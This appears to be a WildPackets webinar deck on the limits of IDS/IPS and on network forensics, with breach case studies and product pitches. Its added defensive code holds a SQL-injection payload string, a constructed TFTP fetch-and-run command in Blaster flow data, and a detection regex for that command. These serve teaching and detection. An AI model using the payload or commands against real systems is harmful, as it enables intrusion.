Cyber Security
IDS/IPS Is Not Enough!

Jay Botelho
Director of Product Management
WildPackets
jbotelho@wildpackets.com
Follow me @jaybotelho / Follow us @wildpackets

Show us your tweets! Use today's webinar hashtag #wp_cybersecurity
with any questions, comments, or feedback.

                                                   © WildPackets, Inc.   www.wildpackets.com
Agenda
•   Current Trends in Cyber Security and Attacks
•   Cyber Attacks – Similarities and Differences
•   IDS/IPS Is Not Enough
•   Network Recording – Cyber Attack Insurance Policy
•   Cyber Attack CSI – Network Forensics
•   Company Overview
•   Product Line Overview

Current Trends in Cyber Security and Attacks

Key 2011 Cyber Attacks
• Sony PlayStation Network (April 2011)
   ‒ Account information, passwords and credit card numbers breached for
     70M users
   ‒ Direct cost of $170M (Sony's own estimate)
   ‒ Indirect cost estimated at 10 to 100x that figure
• The IMF (International Monetary Fund) (June 2011)
   ‒ Hack resulted in the loss of a "large quantity" of data, documents and
     email
• Citigroup (June 2011)
   ‒ More than 200,000 customer accounts hacked
   ‒ A poorly designed web application made it easy
• Android apps (March 2011)
   ‒ More than 50 third-party apps on Google's official Android Market were
     found to contain a Trojan called DroidDream, designed to steal
     personal data
"2011 - The Year of the Hack"
• So named by IT security experts
• 60% of IT executives fear Advanced Persistent Threat (APT) attacks
• 28% fear theft and disclosure from insiders
• 60% use either a written "honor system" security policy or have none
  at all
• 51% allow employees to download/install software
• Companies continue to allow employees to engage in risky behaviors
Based on Bit9's Third Annual Endpoint Survey of 765 IT executives
http://www.businesswire.com/news/home/20110830006206/en/%E2%80%9CYear-Hack%E2%80%9D-Survey-Reveals-Enterprises-Concerned-%E2%80%9CAdvanced
Advanced Persistent Threat
The New Buzzword for 2011/2012
• A long-term pattern of sophisticated hacking attacks aimed at
  governments, companies, and political activists
• Advanced – Full spectrum of techniques
    ‒   Individual components need not be advanced (e.g. commodity malware)
    ‒   Can develop more advanced tools as required
    ‒   Combines multiple targeting methods
    ‒   Focus on operational security not found in less advanced threats
• Persistent – Priority given to a specific task
    ‒ Not opportunistically seeking information for financial gain
    ‒ A "low-and-slow" approach is typical, staying under rate and
      anomaly thresholds
    ‒ Maintains long-term access to the target
• Threat – Capability and intent
    ‒ Executed by coordinated human actions vs. automation
    ‒ Specific objective pursued by skilled, motivated, organized and
      well-funded entities
Survey Results
[Eight chart slides; only the slide titles survive extraction]
• Multiple Successful Attacks
• Confidence Level for Next 12 Months
• Cost For The Past 12 Months
• Source of Breaches
• Cause of Breach
• Severity and Frequency
• Types of Attacks
• Current Security Measures
Source for all eight charts: "Perceptions About Network Security", survey of
IT and IT security practitioners in the U.S., Ponemon Institute Research
Report, June 2011 (583 US IT practitioners, average experience 9.5 years,
51% in organizations with more than 5,000 employees)

Cyber Attacks – Similarities and Differences

Example #1: Heartland Payment Systems
 • SQL injection – attacker-supplied SQL entered into a text field on
   the website was concatenated into a database query and executed
 • Access then gained to key servers
 • Malware then planted to collect credit and debit card numbers
 • 130M accounts breached
 • Calls into question PCI compliance and monitoring
 • Potential upside – end-to-end security for financial transactions is
   now being investigated more seriously

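The injection entry point described above, as an added example that is not Heartland's code or any code from this deck: a vulnerable lookup that splices a form field into the statement text, beside the parameterised form that closes the hole, both run against an in-memory SQLite table of constructed sample rows. The table name, columns and the attacker string are assumptions for illustration.

```python
"""Added example, not Heartland's application code: the SQL-injection
entry point described above, as a vulnerable lookup beside its
parameterised replacement, run against an in-memory SQLite table of
constructed sample rows."""
import sqlite3

# Constructed data: a merchant-facing query over stored card numbers.
# (Storing PANs this way is itself bad practice; the table is only a prop.)
SAMPLE_ROWS = [
    ("merchant-001", "4111111111111111"),
    ("merchant-002", "5500000000000004"),
    ("merchant-003", "340000000000009"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cards (merchant_id TEXT, pan TEXT)")
    conn.executemany("INSERT INTO cards VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, merchant_id):
    # The form field is spliced into the statement text, so quotes and
    # operators inside it become SQL syntax.
    sql = f"SELECT pan FROM cards WHERE merchant_id = '{merchant_id}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, merchant_id):
    # The value travels separately from the statement; whatever it
    # contains is compared as data and cannot change the query's shape.
    sql = "SELECT pan FROM cards WHERE merchant_id = ?"
    return [row[0] for row in conn.execute(sql, (merchant_id,))]


# Constructed attacker input: closes the quoted literal and adds a
# tautology, turning "one merchant's cards" into "every card".
INJECTION = "x' OR '1'='1"


def demo():
    conn = build_db()
    return {
        "normal": lookup_vulnerable(conn, "merchant-001"),
        "vulnerable_injected": lookup_vulnerable(conn, INJECTION),
        "hardened_injected": lookup_parameterised(conn, INJECTION),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:20} -> {len(rows)} row(s)")
```

The same attacker string returns every row through the vulnerable path and nothing through the parameterised one; no IDS signature is involved in either outcome, which is the point of the slide: the fix belongs in the application, and the network record is what tells you afterwards which queries were actually sent.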
Example #2: Twitter Breach
• Compromise the personal Gmail account of an employee
• Reset the Gmail password through account recovery, then set it back to
  the original (found in saved email) so the user is unaware
• Leverage the personal email account to gain access to the corporate
  email account (hosted by Google)
• Read email, attachments, etc., finding things like:
   ‒ Sensitive documents
   ‒ Other user names and passwords (or at least clues)
• Fan out into other services based on the acquired information:
   ‒ Cell phone records
   ‒ MobileMe
   ‒ Amazon/iTunes

Example #3: MSBlaster Worm
• Exploits a Microsoft Windows RPC vulnerability
   ‒ Buffer overflow in the DCOM RPC interface (MS03-026), reached over
     TCP port 135
• Infected machines attempt to propagate the worm to additional machines
   ‒ Infected machines also attempt to launch a Distributed Denial of
     Service (DDoS) attack against Microsoft (windowsupdate.com) on the
     following schedule:
       • Any day in the months September through December
       • The 16th through the last day of the month in January through
         August

IDS/IPS Is Not Enough

What is IDS and IPS?
• IDS – Intrusion Detection System
   ‒ Typically passive: watches a copy of the traffic
   ‒ Detects and alarms on suspected intrusions using signature-based,
     statistical anomaly-based, and/or stateful protocol analysis
     detection
   ‒ Has a reputation for false positives
• IPS – Intrusion Prevention System
   ‒ Either works alongside an IDS, or has embedded IDS capabilities of
     its own
   ‒ Installed in-line, so it is also a point of failure and a throughput
     limit
   ‒ Actively prevents intrusions by dropping the malicious packets,
     resetting the connection and/or blocking traffic from the
     offending IP address

Limitations of IDS/IPS
• No security product is 100% effective
• Risk mitigation – what's your risk tolerance?
• On average 120K malware incidents identified per day by IDS/IPS
• 5 - 20 new malware strains missed every day (a signature cannot exist
  before the strain is known)
• Effectiveness vs. ease-of-use
• Effectiveness vs. cost
• Highly secure vs. high throughput

And What If …

• Data breaches are occurring from within the organization?
• A breached mobile device or infected personal laptop brings outside
  threats inside the network, where they go undetected by most IDS/IPS
  deployments?
• A rogue or unauthorized device tries to access the network internally,
  from behind the firewall?

IDS/IPS – Key Questions
•   Will you sacrifice security for cost?
•   Where does the IDS/IPS provider get their rule set?
•   How much configuration is required?
•   How often is the rule set updated?
•   How well do they cover malware?
•   How well do they cover mainstream vulnerabilities?
•   How fast do they ship updates for critical new vulnerabilities?

IDS/IPS Is Not Enough
[Diagram: attack path through the firewall, the IDS/IPS and the switch]
1. Attack bypasses the firewall
2. IDS/IPS processes only partial attack data
3. Network engineer gets incomplete data from the switch
Result: an incomplete reconstruction hinders diagnosis!

Changing Methods – Network Recorders
[Diagram: firewall, IDS/IPS, network recorder and servers]
1. Attack bypasses the firewall
2. Network recorder records and aggregates packet data throughout the
   attack
3. Event logged; attack partially tracked by the IDS
4. Post-event analysis of the recording reveals attacker, method and
   damage!
Network Recording – Cyber Attack Insurance Policy

Network Recording
• Requires lossless capture and storage of extremely large data volumes
• Focus on enterprise use vs. lawful intercept
   ‒ Concerned with the process of reconstructing a network event
       • Intrusion such as a "hack" or other penetration
       • Network or infrastructure outage
   ‒ Provides a recording of the actual incident
• Based on live IP packet data captures
   ‒ A new way of looking at trace file analysis
   ‒ Continues from where traditional network troubleshooting ends

Connectivity for Network Recording
[Diagram only; no text survives extraction]

Network Data Storage at 1G and 10G
• 1Gbps steady-state traffic assuming no storage overhead
  (figures use 1 Gbps ≈ 128 MB/s; strict SI units give about 2.4% less):
  7.68 GB/min
  460 GB/hr
  11 TB/day
  2.9 days in a 32TB appliance
• 10Gbps:
  76.8 GB/min
  4.6 TB/hr
  110 TB/day
  7.0 hours in a 32TB appliance

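The sizing on the slide above, as an added example that is not WildPackets' sizing tool: a retention calculator that reproduces the slide's figures and then adds what the slide holds constant (link utilisation, the per-packet record header the pcap on-disk format adds, and snaplen truncation). The 16-byte pcap record header is the real format's; the 500-byte average packet and 40% utilisation in the usage lines are assumptions.

```python
"""Added example, not WildPackets' sizing tool: a retention calculator
for a packet recorder.  It reproduces the slide's figures and adds the
variables the slide holds constant (link utilisation, pcap per-packet
record overhead, snaplen truncation)."""

PCAP_RECORD_HEADER = 16                        # bytes pcap adds per packet
SLIDE_BYTES_PER_GBIT = 1024 * 1_000_000 / 8    # 128 MB/s: the slide's basis


def wire_bytes_per_second(link_gbps, utilisation=1.0):
    # The slide's 7.68 GB/min implies 1 Gbps = 128 MB/s (a 1024-Mbit
    # gigabit); strict SI gives 125 MB/s, about 2.4% less.  Keep the
    # slide's basis so the numbers can be checked against it.
    return link_gbps * SLIDE_BYTES_PER_GBIT * utilisation


def disk_bytes_per_second(link_gbps, utilisation=1.0, avg_pkt=None,
                          snaplen=None):
    """Bytes actually written: wire rate, or per-packet stored bytes + header."""
    wire = wire_bytes_per_second(link_gbps, utilisation)
    if avg_pkt is None:
        return wire                 # the slide's "no storage overhead" case
    pps = wire / avg_pkt
    stored = avg_pkt if snaplen is None else min(avg_pkt, snaplen)
    return pps * (stored + PCAP_RECORD_HEADER)


def gb_per_minute(link_gbps, **kw):
    return disk_bytes_per_second(link_gbps, **kw) * 60 / 1e9


def retention_hours(link_gbps, capacity_tb, **kw):
    """How long a feed fits on the appliance before the ring buffer wraps."""
    return capacity_tb * 1e12 / disk_bytes_per_second(link_gbps, **kw) / 3600


if __name__ == "__main__":
    for gbps in (1, 10):
        print(f"{gbps:>2} Gbps: {gb_per_minute(gbps):6.2f} GB/min, "
              f"{retention_hours(gbps, 32):7.1f} h in 32 TB")
    # Assumed: a 1 Gbps link at 40% utilisation with 500-byte average
    # packets, full packets vs. a 96-byte snaplen.
    print(f"full packets: "
          f"{retention_hours(1, 32, utilisation=0.4, avg_pkt=500):.1f} h")
    print(f"snaplen 96:   "
          f"{retention_hours(1, 32, utilisation=0.4, avg_pkt=500, snaplen=96):.1f} h")
```

Two things the slide's headline numbers hide: small packets cost more disk than their wire bytes because each one carries a record header, and a short snaplen buys retention at the price of losing the payload you would need to reconstruct the attack, which is the trade-off the rest of this deck argues against making blindly.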
Cyber Attack CSI – Network Forensics

Key Questions
1. Who was the intruder?
2. How did the intruder penetrate security?
3. What damage has been done?
4. Did the intruder leave anything behind?
5. Did we capture sufficient information to
   effectively analyze and reproduce the attack?




MSBlaster Worm Example
[Packet capture screenshots; the captions are reproduced below]
• Attacking host connects to the target workstation
   ‒ TCP 3-way handshake on port 4444 (the analyzer labels the port
     "NV Video", its IANA service name; here it is the worm's remote
     command shell)
• MSBlaster worm download
   ‒ The workstation pulls the MSBlaster worm binary from the attacking
     host via TFTP download
• Visual reconstruction of the session
• Execute command
   ‒ 141.157.228.12 sends the execute command (activation of the Blaster
     worm payload) to 10.1.1.31
• Infected workstation now attacks others
   ‒ 10.1.1.31 now scans for other nodes in the 180.191.253.XXX range
• Detection filter
   ‒ A filter on the target ports and the execute command identifies
     devices infected with the MSBlaster worm

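The filter on the slide above and the detection styles listed under "What is IDS and IPS?" (signature-based versus stateful analysis), as one added example that is not WildPackets' filter or product code: both rules run over constructed flow records that follow the sequence reconstructed in the capture slides (TCP/135 exploit, TCP/4444 shell, TFTP fetch, execute command, outbound TCP/135 sweep). The addresses are the ones shown on the slides; the shell command text, the scan threshold and the extra hosts are assumptions for illustration.

```python
"""Added example, not WildPackets' filter or product code: detection logic
for the Blaster sequence reconstructed above, run over constructed flow
records.  It implements both a payload signature and a stateful per-host
correlation so the two detection styles can be compared on the same data."""
from collections import defaultdict
import re

# Constructed flow records: (seconds, src, dst, proto, dport, payload).
# The addresses are those shown on the capture slides; the shell command
# text is an assumption for illustration, not bytes from the capture.
ATTACKER, VICTIM = "141.157.228.12", "10.1.1.31"
FLOWS = (
    [(0.0, ATTACKER, VICTIM, "tcp", 135, b""),                      # RPC exploit
     (0.4, ATTACKER, VICTIM, "tcp", 4444,
      b"tftp -i 141.157.228.12 GET msblast.exe\r\n"),              # shell: fetch
     (0.9, VICTIM, ATTACKER, "udp", 69, b""),                        # TFTP read
     (1.5, ATTACKER, VICTIM, "tcp", 4444, b"start msblast.exe\r\n")]  # execute
    # Victim now sweeps 180.191.253.0/24 on TCP/135.
    + [(2.0 + i * 0.01, VICTIM, f"180.191.253.{i}", "tcp", 135, b"")
       for i in range(1, 41)]
    # A host infected before the recorder was started: only its sweep is seen.
    + [(3.0 + i * 0.01, "10.1.1.99", f"10.1.2.{i}", "tcp", 135, b"")
       for i in range(1, 26)]
    # Benign: one legitimate DCOM/RPC client talking to one server.
    + [(5.0, "10.1.1.50", "10.1.1.7", "tcp", 135, b"")]
)

EXEC_SIGNATURE = re.compile(rb"tftp\s+-i\s+\S+\s+GET\s+\S+", re.IGNORECASE)
SCAN_THRESHOLD = 20   # distinct TCP/135 targets before we call it a sweep


def signature_hits(flows):
    """Signature rule: TFTP fetch command seen on the TCP/4444 shell."""
    return [(src, dst) for _, src, dst, proto, dport, payload in flows
            if proto == "tcp" and dport == 4444 and EXEC_SIGNATURE.search(payload)]


def correlate(flows):
    """Stateful rule: build one record per host from the time-ordered flows."""
    hosts = defaultdict(lambda: {"shell_from": None, "shell_t": None,
                                 "tftp_to": None, "exec_cmd": False,
                                 "fanout": set()})
    for t, src, dst, proto, dport, payload in sorted(flows, key=lambda f: f[0]):
        if proto == "tcp" and dport == 4444:          # attacker -> victim shell
            h = hosts[dst]
            if h["shell_from"] is None:
                h["shell_from"], h["shell_t"] = src, t
            h["exec_cmd"] |= bool(EXEC_SIGNATURE.search(payload))
        elif proto == "udp" and dport == 69:          # victim -> attacker TFTP
            hosts[src]["tftp_to"] = dst
        elif proto == "tcp" and dport == 135:         # outbound RPC: count targets
            hosts[src]["fanout"].add(dst)
    return hosts


def classify(hosts):
    """Turn per-host state into verdicts; partial evidence gets its own label."""
    verdicts = {}
    for ip, h in hosts.items():
        staged = h["shell_from"] is not None and (h["tftp_to"] or h["exec_cmd"])
        sweeping = len(h["fanout"]) >= SCAN_THRESHOLD
        if staged and sweeping:
            verdicts[ip] = "infected and propagating"
        elif staged:
            verdicts[ip] = "compromised, not yet propagating"
        elif sweeping:
            # The entry was never recorded: the gap a recorder started after
            # the fact leaves behind.
            verdicts[ip] = "propagating, initial compromise not in capture"
    return verdicts


def detect(flows):
    return signature_hits(flows), classify(correlate(flows))


if __name__ == "__main__":
    hits, verdicts = detect(FLOWS)
    print("signature hits:", hits)
    for ip, verdict in sorted(verdicts.items()):
        print(f"{ip:16} {verdict}")
```

The signature fires once, on the fetch command, and says nothing about what happened next; the correlation names the victim, the attacker and the spread, and still gives a distinct verdict for 10.1.1.99, whose compromise predates the recording. The single RPC client at 10.1.1.50 produces nothing, which is the false-positive case a pure port-135 filter would get wrong.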
What Can You Do?
• Processes, processes, processes
• Implement a network recording/network forensics
 solution
• Establish clear baselines so changes are easy to
 detect
• Employ solutions that continuously monitor packet-
 level security heuristics
• Actively search for minor policy violations that could
 be indicators of bigger problems



Company Overview

Corporate Background
• Experts in network monitoring, analysis, and troubleshooting
   ‒ Founded: 1990 / Headquarters: Walnut Creek, CA
   ‒ Offices throughout the US, EMEA, and APAC


• Our customers are leading edge organizations
   ‒ Mid-market, and enterprise lines of business
   ‒ Financial, manufacturing, ISPs, major federal agencies,
     state and local governments, and universities
   ‒ Over 7,000 customers / 60+ countries / 80% of Fortune 1,000


• Award-winning solutions that improve network performance
   ‒ Internet Telephony, Network Magazine, Network Computing Awards
   ‒ United States Patent 5,787,253 issued July 28, 1998
        • Different approach to maintaining availability of network services

Real-World Deployments
[Customer logos grouped by vertical: Education, Financial, Government,
Health Care / Retail, Telecom, Technology]

Product Line Overview

Product Line Overview
• OmniPeek / Compass – Enterprise Packet Capture, Decode and Analysis
    – 10/100/1000 Ethernet, Wireless, WAN, 10G
    – Portable capture and OmniEngine console
    – VoIP analysis and call playback
• Omnipliance / TimeLine – Distributed Enterprise Network Forensics
    – Packet capture and real-time analysis
    – Stream-to-disk for forensics analysis
    – Integrated OmniAdapter network analysis cards
• WatchPoint – Centralized Enterprise Network Monitoring Appliance
    – Aggregation and graphical display of network data
    – WildPackets OmniEngines
    – NetFlow and sFlow

OmniPeek Network Analyzer
• OmniEngine Manager
   – Connect and configure distributed OmniEngines/Omnipliances
• Comprehensive dashboards present network traffic in real-time
   – Vital statistics and graphs display trends on network and application
     performance
   – Visual peer-map shows conversations and protocols
   – Intuitive drill-down for root-cause analysis of performance bottlenecks
• Visual Expert diagnosis speeds problem resolution
   – Packet and Payload visualizers provide business-centric views
• Automated analytics and problem detection 24/7
   – Easily create filters, triggers, scripting, advanced alarms and alerts




Omnipliance Network Recorders
•   Captures and analyzes all network traffic 24x7
     – Runs our OmniEngine software probe
     – Generates vital statistics on network and application performance
     – Intuitive root-cause analysis of performance bottlenecks
•   Expert analysis speeds problem resolution
     – Fault analysis, statistical analysis, and independent notification
•   Multiple Issue Digital Forensics
     – Real-time and post capture data mining for compliance and troubleshooting
•   Intelligent data transport
     –   Network data analyzed locally
     –   Detailed analysis passed to OmniPeek on demand
     –   Summary statistics sent to WatchPoint for long term trending and reporting
     –   Efficient use of network bandwidth
•   User-Extensible Platform
     – Plug-in architecture and SDK

Omnipliance Network Recorders
Price/performance solutions for every application
• Portable – ruggedized troubleshooting unit
    – Aluminum chassis / 17" LCD
    – Quad-Core Xeon 2.5GHz, 4GB RAM
    – 2 PCI-E slots, 2 built-in Ethernet ports
    – 500GB and 2.5TB SATA storage capacity
• Edge – small networks, remote offices
    – 1U rack-mountable chassis
    – Quad-Core Intel Xeon X3460 2.80GHz, 4GB RAM
    – 2 PCI-E slots, 2 built-in Ethernet ports
    – 1TB SATA storage capacity
• Core – datacenter workhorse, easily expandable
    – 3U rack-mountable chassis
    – Two Quad-Core Intel Xeon E5530 2.4GHz, 6GB RAM
    – 4 PCI-E slots, 2 built-in Ethernet ports
    – 2TB SATA storage capacity

TimeLine
• Fastest network recording and real-time statistical
 display — simultaneously
   ‒ 11.7Gbps sustained capture with zero packet loss
   ‒ Network statistics display in TimeLine visualization format
• Rapid, intuitive forensics search and retrieval
   ‒ Historical network traffic analysis and quick data rewinding
   ‒ Several pre-defined forensics search templates making
     searches easy and fast
• A natural extension to the WildPackets product line
• Turnkey bundled solution
   ‒ Appliance + OmniEngine, OmniAdapter, OmniPeek Connect


TimeLine
For the most demanding network analysis tasks
• 10G Network Forensics appliance
    – 3U rack-mountable chassis
    – Two Quad-Core Intel Xeon 5560 2.8GHz
    – 18GB RAM
    – 4 PCI-E slots
    – 2 built-in Ethernet ports
    – 8/16/32TB SATA storage capacity

WatchPoint
Centralized Monitoring for Distributed Enterprise Networks
• High-level, aggregated view of all network segments
    – Monitor per campus, per region, per country
• Wide range of network data
    – NetFlow, sFlow, OmniFlow
• Web-based, customizable network dashboards
• Flexible detailed reports
• Omnipliances must be configured for continuous capture

WildPackets Key Differentiators
• Visual Expert Intelligence with Intuitive Drill-down
    – Let the computer do the hard work and return results in real time
    – Packet / Payload Visualizers are faster than packet-by-packet diagnostics
    – Expert rules and analytics can be saved and automated
• Automated Capture Analytics
    – Filters, triggers, scripting and an advanced alarming system combine to
      provide automated network problem detection 24x7
• Multiple Issue Network Forensics
    – Issues can be tracked by one or more people simultaneously
    – Real-time or post capture
• User-Extensible Platform
    – Plug-in architecture and SDK
• Aggregated Network Views and Reporting
    – NetFlow, sFlow, and OmniFlow

Q&A
Use today's webinar hashtag #wp_cybersecurity with any questions,
comments, or feedback. Follow us @wildpackets.
Check out today's slides on SlideShare: www.slideshare.net/wildpackets

Thank You!

WildPackets, Inc.
1340 Treat Boulevard, Suite 500
Walnut Creek, CA 94597
(925) 937-3200

Cognitive Computing in Security with AI Cognitive Computing in Security with AI
Cognitive Computing in Security with AI
 
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docxCISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
 
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docxCISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
 
DataPreserve- SEVRAR Jan 09
DataPreserve- SEVRAR Jan 09DataPreserve- SEVRAR Jan 09
DataPreserve- SEVRAR Jan 09
 
Intel Cyber Security Briefing at the Cyberstrat14 Security Conference in Hels...
Intel Cyber Security Briefing at the Cyberstrat14 Security Conference in Hels...Intel Cyber Security Briefing at the Cyberstrat14 Security Conference in Hels...
Intel Cyber Security Briefing at the Cyberstrat14 Security Conference in Hels...
 
Whitepaper: IP Risk Assessment & Loss Prevention - Happiest Minds
Whitepaper: IP Risk Assessment & Loss Prevention - Happiest MindsWhitepaper: IP Risk Assessment & Loss Prevention - Happiest Minds
Whitepaper: IP Risk Assessment & Loss Prevention - Happiest Minds
 
Part 1: Identifying Insider Threats with Fidelis EDR Technology
Part 1: Identifying  Insider Threats with Fidelis EDR Technology Part 1: Identifying  Insider Threats with Fidelis EDR Technology
Part 1: Identifying Insider Threats with Fidelis EDR Technology
 
CompTIA Security Study [Report]
CompTIA  Security Study [Report]CompTIA  Security Study [Report]
CompTIA Security Study [Report]
 
Protecting endpoints from targeted attacks
Protecting endpoints from targeted attacksProtecting endpoints from targeted attacks
Protecting endpoints from targeted attacks
 
CS Sakerhetsdagen 2015 IBM Feb 19
CS Sakerhetsdagen 2015 IBM Feb 19CS Sakerhetsdagen 2015 IBM Feb 19
CS Sakerhetsdagen 2015 IBM Feb 19
 
Select and Implement a Next Generation Endpoint Protection Solution
Select and Implement a Next Generation Endpoint Protection SolutionSelect and Implement a Next Generation Endpoint Protection Solution
Select and Implement a Next Generation Endpoint Protection Solution
 
Why Have A Digital Investigative Infrastructure
Why Have A Digital Investigative InfrastructureWhy Have A Digital Investigative Infrastructure
Why Have A Digital Investigative Infrastructure
 
Risks vs real life
Risks vs real lifeRisks vs real life
Risks vs real life
 
Top_10_Interview_Questions_That_You_Should_Know_as_an_Information.pptx
Top_10_Interview_Questions_That_You_Should_Know_as_an_Information.pptxTop_10_Interview_Questions_That_You_Should_Know_as_an_Information.pptx
Top_10_Interview_Questions_That_You_Should_Know_as_an_Information.pptx
 
Organizational Security: When People are Involved
Organizational Security: When People are InvolvedOrganizational Security: When People are Involved
Organizational Security: When People are Involved
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
 
IT Executive Guide to Security Intelligence
IT Executive Guide to Security IntelligenceIT Executive Guide to Security Intelligence
IT Executive Guide to Security Intelligence
 
Pci compliance training agents
Pci compliance training  agentsPci compliance training  agents
Pci compliance training agents
 

More from Savvius, Inc

WildPackets EMA Whitepaper Preview
WildPackets EMA Whitepaper PreviewWildPackets EMA Whitepaper Preview
WildPackets EMA Whitepaper Preview
Savvius, Inc
 

More from Savvius, Inc (20)

Introducing Savvius Vigil
Introducing Savvius VigilIntroducing Savvius Vigil
Introducing Savvius Vigil
 
Long Term Reporting with Savvius and Splunk
Long Term Reporting with Savvius and SplunkLong Term Reporting with Savvius and Splunk
Long Term Reporting with Savvius and Splunk
 
Network Forensics Backwards and Forwards
Network Forensics Backwards and ForwardsNetwork Forensics Backwards and Forwards
Network Forensics Backwards and Forwards
 
Network Analysis Tips & Tricks with Omnipeek
Network Analysis Tips & Tricks with OmnipeekNetwork Analysis Tips & Tricks with Omnipeek
Network Analysis Tips & Tricks with Omnipeek
 
Why Every Engineer Needs WLAN Packet Analysis
Why Every Engineer Needs WLAN Packet AnalysisWhy Every Engineer Needs WLAN Packet Analysis
Why Every Engineer Needs WLAN Packet Analysis
 
Bright talk voip vofi webinar jan2015-v2
Bright talk voip vofi webinar jan2015-v2Bright talk voip vofi webinar jan2015-v2
Bright talk voip vofi webinar jan2015-v2
 
You Suspect a Security Breach. Network Forensic Analysis Gives You the Answers
You Suspect a Security Breach. Network Forensic Analysis Gives You the AnswersYou Suspect a Security Breach. Network Forensic Analysis Gives You the Answers
You Suspect a Security Breach. Network Forensic Analysis Gives You the Answers
 
Are you ready for 802.11ac?
Are you ready for 802.11ac?Are you ready for 802.11ac?
Are you ready for 802.11ac?
 
Are You Missing Something?
Are You Missing Something?Are You Missing Something?
Are You Missing Something?
 
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not LostNetwork Forensics Exposes Today's Advanced Security Thr...All Hope is Not LostNetwork Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
 
Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...
Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...
Visibility into 40G/100G Networks for Real-time and Post Capture Analysis and...
 
Managing a Widely Distributed Network
Managing a Widely Distributed NetworkManaging a Widely Distributed Network
Managing a Widely Distributed Network
 
VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...
VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...
VoIP Monitoring and Analysis - Still Top of Mind in Network Performance Monit...
 
WildPackets EMA Whitepaper Preview
WildPackets EMA Whitepaper PreviewWildPackets EMA Whitepaper Preview
WildPackets EMA Whitepaper Preview
 
Gigabit WLANs Need Gigabit WLAN Analysis
Gigabit WLANs Need Gigabit WLAN AnalysisGigabit WLANs Need Gigabit WLAN Analysis
Gigabit WLANs Need Gigabit WLAN Analysis
 
Security Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSecurity Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network Attacks
 
Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...
Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...
Network Network Visibility - The Key to Rapidly Troubleshooting Network Perfo...
 
Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)
Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)
Wireless Network Analysis 101 VoFi (Voice over Wi-Fi)
 
The Changing Landscape in Network Performance Monitoring
The Changing Landscape in Network Performance Monitoring The Changing Landscape in Network Performance Monitoring
The Changing Landscape in Network Performance Monitoring
 
Wired and Wireless Network Forensics
Wired and Wireless Network ForensicsWired and Wireless Network Forensics
Wired and Wireless Network Forensics
 

Recently uploaded

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 

Recently uploaded (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
